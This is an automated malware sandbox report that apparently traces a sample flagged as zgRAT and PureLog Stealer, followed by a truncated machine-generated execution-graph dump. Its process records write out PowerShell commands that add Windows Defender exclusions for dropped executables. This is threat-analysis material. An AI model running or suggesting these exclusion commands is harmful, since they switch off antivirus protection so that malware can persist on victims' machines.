                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\jnowHpJlZlXal.exe'
                                                  Imagebase:0x7ff741d30000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:67
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\jnowHpJlZlXal.exe'
                                                  Imagebase:0x7ff741d30000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:68
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  Target ID:69
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\services.exe'
                                                  Imagebase:0x7ff741d30000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:70
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  Target ID:71
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\msportComWin\BridgePortsurrogateserverref.exe'
                                                  Imagebase:0x7ff741d30000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:72
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  Target ID:73
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  Target ID:74
                                                  Start time:07:31:30
                                                  Start date:13/01/2025
                                                  Path:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  Imagebase:0xff0000
                                                  File size:2'002'944 bytes
                                                  MD5 hash:5F80A11E82CC7495CF5AD7DF3D052721
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:75
                                                  Start time:07:31:30
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  Target ID:76
                                                  Start time:07:31:30
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  Target ID:77
                                                  Start time:07:31:31
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8SIf5KWJtt.bat"
                                                  Imagebase:0x7ff74ccc0000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:78
                                                  Start time:07:31:31
                                                  Start date:13/01/2025
                                                  Path:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  Imagebase:0xf10000
                                                  File size:2'002'944 bytes
                                                  MD5 hash:5F80A11E82CC7495CF5AD7DF3D052721
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:80
                                                  Start time:07:31:31
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:81
                                                  Start time:07:31:32
                                                  Start date:13/01/2025
                                                  Path:C:\Recovery\services.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Recovery\services.exe
                                                  Imagebase:0x360000
                                                  File size:2'002'944 bytes
                                                  MD5 hash:5F80A11E82CC7495CF5AD7DF3D052721
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\services.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\services.exe, Author: Joe Security
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 83%, ReversingLabs
                                                  Has exited:true

                                                  Target ID:82
                                                  Start time:07:31:33
                                                  Start date:13/01/2025
                                                  Path:C:\Recovery\services.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Recovery\services.exe
                                                  Imagebase:0xe60000
                                                  File size:2'002'944 bytes
                                                  MD5 hash:5F80A11E82CC7495CF5AD7DF3D052721
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:83
                                                  Start time:07:31:35
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\chcp.com
                                                  Wow64 process (32bit):false
                                                  Commandline:chcp 65001
                                                  Imagebase:0x7ff616fa0000
                                                  File size:14'848 bytes
                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true


                                                    Execution Graph

                                                    Execution Coverage:9.4%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:9.5%
                                                    Total number of Nodes:1490
                                                    Total number of Limit Nodes:43
                                                    execution_graph: node/edge listing of the interactive call graph (numbered basic-block nodes at image addresses such as d0e85d, d0b7e0 and d0c73f, with the Windows API calls they reach, e.g. LoadLibraryExA, GetProcAddress, VirtualProtect, RaiseException, CreateFileMappingW, MapViewOfFile, ShellExecuteExW, SetCurrentDirectoryW, DeleteFileW, MoveFileExW, TlsAlloc, InitializeCriticalSectionAndSpinCount); the raw graph data is truncated here and is only meaningful in the interactive report.
GetWindow 24098 d0d6d5 24097->24098 24099 d0bf15 24097->24099 24098->24099 24100 d0d6e2 GetClassNameW 24098->24100 24102 d0d706 GetWindowLongW 24098->24102 24103 d0d76a GetWindow 24098->24103 24099->23863 24099->23864 24710 d01fbb CompareStringW 24100->24710 24102->24103 24104 d0d716 SendMessageW 24102->24104 24103->24098 24103->24099 24104->24103 24105 d0d72c GetObjectW 24104->24105 24711 d0a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24105->24711 24107 d0d743 24712 d0a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24107->24712 24713 d0a80c 8 API calls 24107->24713 24110 d0d754 SendMessageW DeleteObject 24110->24103 24111->23878 24113 d0abf1 24112->24113 24114 d0abcc 24112->24114 24115 d0abf6 SHAutoComplete 24113->24115 24116 d0abff 24113->24116 24716 d01fbb CompareStringW 24114->24716 24115->24116 24120 d0b093 24116->24120 24118 d0abdf 24118->24113 24119 d0abe3 FindWindowExW 24118->24119 24119->24113 24121 d0b09d __EH_prolog 24120->24121 24122 cf13dc 84 API calls 24121->24122 24123 d0b0bf 24122->24123 24717 cf1fdc 24123->24717 24126 d0b0d9 24128 cf1692 86 API calls 24126->24128 24127 d0b0eb 24129 cf19af 128 API calls 24127->24129 24130 d0b0e4 24128->24130 24132 d0b10d __InternalCxxFrameHandler ___std_exception_copy 24129->24132 24130->23906 24130->23911 24131 cf1692 86 API calls 24131->24130 24132->24131 24133->23957 24135 d0b568 5 API calls 24134->24135 24136 d0d4e0 GetDlgItem 24135->24136 24137 d0d502 24136->24137 24138 d0d536 SendMessageW SendMessageW 24136->24138 24141 d0d50d ShowWindow SendMessageW SendMessageW 24137->24141 24139 d0d591 SendMessageW SendMessageW SendMessageW 24138->24139 24140 d0d572 24138->24140 24142 d0d5c4 SendMessageW 24139->24142 24143 d0d5e7 SendMessageW 24139->24143 24140->24139 24141->24138 24142->24143 24143->23910 24144->23968 24145->23996 24146->24001 24147->24006 24148->24012 24149->24019 24150->23946 24151->23967 24152->23939 24153->23927 24154->24027 24155->24024 24157 cfa2bf 24156->24157 24158 cfa2e3 24157->24158 24159 
cfa2d6 CreateDirectoryW 24157->24159 24160 cfa231 3 API calls 24158->24160 24159->24158 24161 cfa316 24159->24161 24162 cfa2e9 24160->24162 24164 cfa325 24161->24164 24169 cfa4ed 24161->24169 24163 cfa329 GetLastError 24162->24163 24166 cfbb03 GetCurrentDirectoryW 24162->24166 24163->24164 24164->24033 24167 cfa2ff 24166->24167 24167->24163 24168 cfa303 CreateDirectoryW 24167->24168 24168->24161 24168->24163 24170 d0ec50 24169->24170 24171 cfa4fa SetFileAttributesW 24170->24171 24172 cfa53d 24171->24172 24173 cfa510 24171->24173 24172->24164 24174 cfbb03 GetCurrentDirectoryW 24173->24174 24175 cfa524 24174->24175 24175->24172 24176 cfa528 SetFileAttributesW 24175->24176 24176->24172 24178 cf9757 24177->24178 24179 cf9781 24177->24179 24178->24179 24188 cfa1e0 24178->24188 24179->24052 24183 cf962c 24182->24183 24185 cf964a 24182->24185 24183->24185 24186 cf9638 CloseHandle 24183->24186 24184 cf9669 24184->24052 24185->24184 24196 cf6bd5 76 API calls 24185->24196 24186->24185 24189 d0ec50 24188->24189 24190 cfa1ed DeleteFileW 24189->24190 24191 cf977f 24190->24191 24192 cfa200 24190->24192 24191->24052 24193 cfbb03 GetCurrentDirectoryW 24192->24193 24194 cfa214 24193->24194 24194->24191 24195 cfa218 DeleteFileW 24194->24195 24195->24191 24196->24184 24197->24071 24198->24071 24199->24069 24200->24071 24201->24071 24202->24071 24204 d00666 _wcslen 24203->24204 24231 cf17e9 24204->24231 24206 d0067e 24206->24084 24208 d00659 _wcslen 24207->24208 24209 cf17e9 78 API calls 24208->24209 24210 d0067e 24209->24210 24210->24086 24212 cf7b17 __EH_prolog 24211->24212 24248 cfce40 24212->24248 24214 cf7b32 24254 d0eb38 24214->24254 24216 cf7b5c 24263 d04a76 24216->24263 24219 cf7c7d 24220 cf7c87 24219->24220 24221 cf7cf1 24220->24221 24295 cfa56d 24220->24295 24225 cf7d50 24221->24225 24273 cf8284 24221->24273 24223 cf7d92 24223->24090 24225->24223 24301 cf138b 74 API calls 24225->24301 24228 cf7bac 24227->24228 24229 cf7bb3 24227->24229 24230 d02297 86 API calls 24228->24230 
24230->24229 24232 cf17ff 24231->24232 24241 cf185a __InternalCxxFrameHandler 24231->24241 24233 cf1828 24232->24233 24244 cf6c36 76 API calls __vswprintf_c_l 24232->24244 24235 cf1887 24233->24235 24240 cf1847 ___std_exception_copy 24233->24240 24237 d13e3e 22 API calls 24235->24237 24236 cf181e 24245 cf6ca7 75 API calls 24236->24245 24239 cf188e 24237->24239 24239->24241 24247 cf6ca7 75 API calls 24239->24247 24240->24241 24246 cf6ca7 75 API calls 24240->24246 24241->24206 24244->24236 24245->24233 24246->24241 24247->24241 24249 cfce4a __EH_prolog 24248->24249 24250 d0eb38 8 API calls 24249->24250 24252 cfce8d 24250->24252 24251 d0eb38 8 API calls 24253 cfceb1 24251->24253 24252->24251 24253->24214 24256 d0eb3d ___std_exception_copy 24254->24256 24255 d0eb57 24255->24216 24256->24255 24259 d0eb59 24256->24259 24269 d17a5e 7 API calls 2 library calls 24256->24269 24258 d0f5c9 24271 d1238d RaiseException 24258->24271 24259->24258 24270 d1238d RaiseException 24259->24270 24261 d0f5e6 24264 d04a80 __EH_prolog 24263->24264 24265 d0eb38 8 API calls 24264->24265 24266 d04a9c 24265->24266 24267 cf7b8b 24266->24267 24272 d00e46 80 API calls 24266->24272 24267->24219 24269->24256 24270->24258 24271->24261 24272->24267 24274 cf828e __EH_prolog 24273->24274 24302 cf13dc 24274->24302 24276 cf82aa 24277 cf82bb 24276->24277 24442 cf9f42 24276->24442 24280 cf82f2 24277->24280 24310 cf1a04 24277->24310 24438 cf1692 24280->24438 24283 cf82ee 24283->24280 24291 cfa56d 7 API calls 24283->24291 24293 cf8389 24283->24293 24446 cfc0c5 CompareStringW _wcslen 24283->24446 24287 cf83e8 24334 cf1f6d 24287->24334 24291->24283 24292 cf83f3 24292->24280 24338 cf3b2d 24292->24338 24350 cf848e 24292->24350 24329 cf8430 24293->24329 24297 cfa582 24295->24297 24296 cfa5b0 24296->24220 24297->24296 24694 cfa69b 24297->24694 24299 cfa592 24299->24296 24300 cfa597 FindClose 24299->24300 24300->24296 24301->24223 24303 cf13e1 __EH_prolog 24302->24303 24304 cfce40 8 API calls 24303->24304 24305 
cf1419 24304->24305 24306 d0eb38 8 API calls 24305->24306 24309 cf1474 __cftof 24305->24309 24307 cf1461 24306->24307 24308 cfb505 84 API calls 24307->24308 24307->24309 24308->24309 24309->24276 24311 cf1a0e __EH_prolog 24310->24311 24323 cf1a61 24311->24323 24325 cf1b9b 24311->24325 24448 cf13ba 24311->24448 24313 cf1bc7 24460 cf138b 74 API calls 24313->24460 24316 cf3b2d 101 API calls 24319 cf1c12 24316->24319 24317 cf1bd4 24317->24316 24317->24325 24318 cf1c5a 24322 cf1c8d 24318->24322 24318->24325 24461 cf138b 74 API calls 24318->24461 24319->24318 24321 cf3b2d 101 API calls 24319->24321 24321->24319 24322->24325 24327 cf9e80 79 API calls 24322->24327 24323->24313 24323->24317 24323->24325 24324 cf3b2d 101 API calls 24326 cf1cde 24324->24326 24325->24283 24326->24324 24326->24325 24327->24326 24481 cfcf3d 24329->24481 24331 cf8440 24485 d013d2 GetSystemTime SystemTimeToFileTime 24331->24485 24333 cf83a3 24333->24287 24447 d01b66 72 API calls 24333->24447 24335 cf1f72 __EH_prolog 24334->24335 24337 cf1fa6 24335->24337 24490 cf19af 24335->24490 24337->24292 24339 cf3b39 24338->24339 24340 cf3b3d 24338->24340 24339->24292 24349 cf9e80 79 API calls 24340->24349 24341 cf3b4f 24342 cf3b6a 24341->24342 24343 cf3b78 24341->24343 24344 cf3baa 24342->24344 24620 cf32f7 89 API calls 2 library calls 24342->24620 24621 cf286b 101 API calls 3 library calls 24343->24621 24344->24292 24347 cf3b76 24347->24344 24622 cf20d7 74 API calls 24347->24622 24349->24341 24351 cf8498 __EH_prolog 24350->24351 24354 cf84d5 24351->24354 24365 cf8513 24351->24365 24647 d08c8d 103 API calls 24351->24647 24353 cf84f5 24355 cf851c 24353->24355 24356 cf84fa 24353->24356 24354->24353 24359 cf857a 24354->24359 24354->24365 24355->24365 24649 d08c8d 103 API calls 24355->24649 24356->24365 24648 cf7a0d 152 API calls 24356->24648 24359->24365 24623 cf5d1a 24359->24623 24361 cf8605 24361->24365 24629 cf8167 24361->24629 24364 cf8797 24366 cfa56d 7 API calls 24364->24366 24369 cf8802 24364->24369 
24365->24292 24366->24369 24368 cfd051 82 API calls 24375 cf885d 24368->24375 24635 cf7c0d 24369->24635 24370 cf898b 24652 cf2021 74 API calls 24370->24652 24371 cf8a5f 24378 cf8ab6 24371->24378 24386 cf8a6a 24371->24386 24372 cf8992 24372->24371 24379 cf89e1 24372->24379 24375->24365 24375->24368 24375->24370 24375->24372 24650 cf8117 84 API calls 24375->24650 24651 cf2021 74 API calls 24375->24651 24376 cf8b14 24382 cf8b82 24376->24382 24426 cf9105 24376->24426 24656 cf98bc 24376->24656 24377 cf8a4c 24377->24376 24385 cf8ab4 24377->24385 24378->24377 24655 cf7fc0 97 API calls 24378->24655 24379->24376 24379->24377 24381 cfa231 3 API calls 24379->24381 24380 cf959a 80 API calls 24380->24365 24388 cf8a19 24381->24388 24387 cfab1a 8 API calls 24382->24387 24384 cf959a 80 API calls 24384->24365 24385->24380 24386->24385 24654 cf7db2 101 API calls 24386->24654 24390 cf8bd1 24387->24390 24388->24377 24653 cf92a3 97 API calls 24388->24653 24393 cfab1a 8 API calls 24390->24393 24406 cf8be7 24393->24406 24396 cf8b70 24660 cf6e98 77 API calls 24396->24660 24398 cf8cbc 24399 cf8d18 24398->24399 24400 cf8e40 24398->24400 24401 cf8d8a 24399->24401 24402 cf8d28 24399->24402 24403 cf8e66 24400->24403 24404 cf8e52 24400->24404 24423 cf8d49 24400->24423 24411 cf8167 19 API calls 24401->24411 24407 cf8d6e 24402->24407 24415 cf8d37 24402->24415 24405 d03377 75 API calls 24403->24405 24408 cf9215 123 API calls 24404->24408 24409 cf8e7f 24405->24409 24406->24398 24410 cf8c93 24406->24410 24417 cf981a 79 API calls 24406->24417 24407->24423 24663 cf77b8 111 API calls 24407->24663 24408->24423 24666 d03020 123 API calls 24409->24666 24410->24398 24661 cf9a3c 82 API calls 24410->24661 24414 cf8dbd 24411->24414 24419 cf8de6 24414->24419 24420 cf8df5 24414->24420 24414->24423 24662 cf2021 74 API calls 24415->24662 24417->24410 24664 cf7542 85 API calls 24419->24664 24665 cf9155 93 API calls __EH_prolog 24420->24665 24429 cf8f85 24423->24429 24667 cf2021 74 API calls 24423->24667 24425 
cf9090 24425->24426 24428 cfa4ed 3 API calls 24425->24428 24426->24384 24427 cf903e 24642 cf9da2 24427->24642 24430 cf90eb 24428->24430 24429->24425 24429->24426 24429->24427 24641 cf9f09 SetEndOfFile 24429->24641 24430->24426 24668 cf2021 74 API calls 24430->24668 24433 cf9085 24435 cf9620 77 API calls 24433->24435 24435->24425 24436 cf90fb 24669 cf6dcb 76 API calls 24436->24669 24439 cf16a4 24438->24439 24685 cfcee1 24439->24685 24443 cf9f59 24442->24443 24445 cf9f63 24443->24445 24693 cf6d0c 78 API calls 24443->24693 24445->24277 24446->24283 24447->24287 24462 cf1732 24448->24462 24450 cf13d6 24451 cf9e80 24450->24451 24452 cf9ea5 24451->24452 24453 cf9e92 24451->24453 24454 cf9eb0 24452->24454 24455 cf9eb8 SetFilePointer 24452->24455 24453->24454 24479 cf6d5b 77 API calls 24453->24479 24454->24323 24455->24454 24457 cf9ed4 GetLastError 24455->24457 24457->24454 24458 cf9ede 24457->24458 24458->24454 24480 cf6d5b 77 API calls 24458->24480 24460->24325 24461->24322 24463 cf1748 24462->24463 24474 cf17a0 __InternalCxxFrameHandler 24462->24474 24464 cf1771 24463->24464 24475 cf6c36 76 API calls __vswprintf_c_l 24463->24475 24466 cf17c7 24464->24466 24470 cf178d ___std_exception_copy 24464->24470 24468 d13e3e 22 API calls 24466->24468 24467 cf1767 24476 cf6ca7 75 API calls 24467->24476 24471 cf17ce 24468->24471 24470->24474 24477 cf6ca7 75 API calls 24470->24477 24471->24474 24478 cf6ca7 75 API calls 24471->24478 24474->24450 24475->24467 24476->24464 24477->24474 24478->24474 24479->24452 24480->24454 24482 cfcf4d 24481->24482 24484 cfcf54 24481->24484 24486 cf981a 24482->24486 24484->24331 24485->24333 24487 cf9833 24486->24487 24489 cf9e80 79 API calls 24487->24489 24488 cf9865 24488->24484 24489->24488 24491 cf19bf 24490->24491 24493 cf19bb 24490->24493 24494 cf18f6 24491->24494 24493->24337 24495 cf1908 24494->24495 24496 cf1945 24494->24496 24497 cf3b2d 101 API calls 24495->24497 24502 cf3fa3 24496->24502 24498 cf1928 24497->24498 24498->24493 24505 cf3fac 
24502->24505 24503 cf3b2d 101 API calls 24503->24505 24505->24503 24506 cf1966 24505->24506 24519 d00e08 24505->24519 24506->24498 24507 cf1e50 24506->24507 24508 cf1e5a __EH_prolog 24507->24508 24527 cf3bba 24508->24527 24510 cf1e84 24511 cf1732 78 API calls 24510->24511 24513 cf1f0b 24510->24513 24512 cf1e9b 24511->24512 24555 cf18a9 78 API calls 24512->24555 24513->24498 24515 cf1eb3 24517 cf1ebf _wcslen 24515->24517 24556 d01b84 MultiByteToWideChar 24515->24556 24557 cf18a9 78 API calls 24517->24557 24520 d00e0f 24519->24520 24521 d00e2a 24520->24521 24525 cf6c31 RaiseException CallUnexpected 24520->24525 24523 d00e3b SetThreadExecutionState 24521->24523 24526 cf6c31 RaiseException CallUnexpected 24521->24526 24523->24505 24525->24521 24526->24523 24528 cf3bc4 __EH_prolog 24527->24528 24529 cf3bda 24528->24529 24530 cf3bf6 24528->24530 24583 cf138b 74 API calls 24529->24583 24532 cf3e51 24530->24532 24535 cf3c22 24530->24535 24600 cf138b 74 API calls 24532->24600 24534 cf3be5 24534->24510 24535->24534 24558 d03377 24535->24558 24537 cf3ca3 24538 cf3d2e 24537->24538 24554 cf3c9a 24537->24554 24586 cfd051 24537->24586 24568 cfab1a 24538->24568 24539 cf3c9f 24539->24537 24585 cf20bd 78 API calls 24539->24585 24541 cf3c8f 24584 cf138b 74 API calls 24541->24584 24542 cf3c71 24542->24537 24542->24539 24542->24541 24545 cf3d41 24548 cf3dd7 24545->24548 24549 cf3dc7 24545->24549 24592 d03020 123 API calls 24548->24592 24572 cf9215 24549->24572 24552 cf3dd5 24552->24554 24593 cf2021 74 API calls 24552->24593 24594 d02297 24554->24594 24555->24515 24556->24517 24557->24513 24559 d0338c 24558->24559 24561 d03396 ___std_exception_copy 24558->24561 24601 cf6ca7 75 API calls 24559->24601 24562 d034c6 24561->24562 24563 d0341c 24561->24563 24567 d03440 __cftof 24561->24567 24603 d1238d RaiseException 24562->24603 24602 d032aa 75 API calls 3 library calls 24563->24602 24566 d034f2 24567->24542 24569 cfab28 24568->24569 24571 cfab32 24568->24571 24570 d0eb38 8 API calls 
24569->24570 24570->24571 24571->24545 24573 cf921f __EH_prolog 24572->24573 24604 cf7c64 24573->24604 24576 cf13ba 78 API calls 24577 cf9231 24576->24577 24607 cfd114 24577->24607 24579 cf928a 24579->24552 24581 cfd114 118 API calls 24582 cf9243 24581->24582 24582->24579 24582->24581 24616 cfd300 97 API calls __InternalCxxFrameHandler 24582->24616 24583->24534 24584->24554 24585->24537 24587 cfd084 24586->24587 24588 cfd072 24586->24588 24618 cf603a 82 API calls 24587->24618 24617 cf603a 82 API calls 24588->24617 24591 cfd07c 24591->24538 24592->24552 24593->24554 24595 d022a1 24594->24595 24596 d022ba 24595->24596 24599 d022ce 24595->24599 24619 d00eed 86 API calls 24596->24619 24598 d022c1 24598->24599 24600->24534 24601->24561 24602->24567 24603->24566 24605 cfb146 GetVersionExW 24604->24605 24606 cf7c69 24605->24606 24606->24576 24613 cfd12a __InternalCxxFrameHandler 24607->24613 24608 cfd29a 24609 cfd2ce 24608->24609 24610 cfd0cb 6 API calls 24608->24610 24611 d00e08 SetThreadExecutionState RaiseException 24609->24611 24610->24609 24614 cfd291 24611->24614 24612 d08c8d 103 API calls 24612->24613 24613->24608 24613->24612 24613->24614 24615 cfac05 91 API calls 24613->24615 24614->24582 24615->24613 24616->24582 24617->24591 24618->24591 24619->24598 24620->24347 24621->24347 24622->24344 24624 cf5d2a 24623->24624 24670 cf5c4b 24624->24670 24627 cf5d5d 24628 cf5d95 24627->24628 24675 cfb1dc CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 24627->24675 24628->24361 24630 cf8186 24629->24630 24631 cf8232 24630->24631 24682 cfbe5e 19 API calls __InternalCxxFrameHandler 24630->24682 24681 d01fac CharUpperW 24631->24681 24634 cf823b 24634->24364 24636 cf7c22 24635->24636 24637 cf7c5a 24636->24637 24683 cf6e7a 74 API calls 24636->24683 24637->24375 24639 cf7c52 24684 cf138b 74 API calls 24639->24684 24641->24427 24643 cf9db3 24642->24643 24646 cf9dc2 24642->24646 24644 cf9db9 FlushFileBuffers 24643->24644 24643->24646 24644->24646 24645 cf9e3f 
SetFileTime 24645->24433 24646->24645 24647->24354 24648->24365 24649->24365 24650->24375 24651->24375 24652->24372 24653->24377 24654->24385 24655->24377 24657 cf98c5 GetFileType 24656->24657 24658 cf8b5a 24656->24658 24657->24658 24658->24382 24659 cf2021 74 API calls 24658->24659 24659->24396 24660->24382 24661->24398 24662->24423 24663->24423 24664->24423 24665->24423 24666->24423 24667->24429 24668->24436 24669->24426 24676 cf5b48 24670->24676 24672 cf5c6c 24672->24627 24674 cf5b48 2 API calls 24674->24672 24675->24627 24678 cf5b52 24676->24678 24677 cf5c3a 24677->24672 24677->24674 24678->24677 24680 cfb1dc CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 24678->24680 24680->24678 24681->24634 24682->24631 24683->24639 24684->24637 24686 cfcef2 24685->24686 24691 cfa99e 86 API calls 24686->24691 24688 cfcf24 24692 cfa99e 86 API calls 24688->24692 24690 cfcf2f 24691->24688 24692->24690 24693->24445 24695 cfa6a8 24694->24695 24696 cfa727 FindNextFileW 24695->24696 24697 cfa6c1 FindFirstFileW 24695->24697 24699 cfa732 GetLastError 24696->24699 24704 cfa709 24696->24704 24698 cfa6d0 24697->24698 24697->24704 24700 cfbb03 GetCurrentDirectoryW 24698->24700 24699->24704 24701 cfa6e0 24700->24701 24702 cfa6fe GetLastError 24701->24702 24703 cfa6e4 FindFirstFileW 24701->24703 24702->24704 24703->24702 24703->24704 24704->24299 24714 d0a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24705->24714 24707 d0a5cd 24708 d0a5d9 24707->24708 24715 d0a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24707->24715 24708->24097 24708->24099 24710->24098 24711->24107 24712->24107 24713->24110 24714->24707 24715->24708 24716->24118 24718 cf9f42 78 API calls 24717->24718 24719 cf1fe8 24718->24719 24720 cf1a04 101 API calls 24719->24720 24722 cf2005 24719->24722 24721 cf1ff5 24720->24721 24721->24722 24724 cf138b 74 API calls 24721->24724 24722->24126 24722->24127 24724->24722 25389 d094e0 GetClientRect 25390 d0f2e0 46 API calls __RTC_Initialize 25441 d021e0 26 
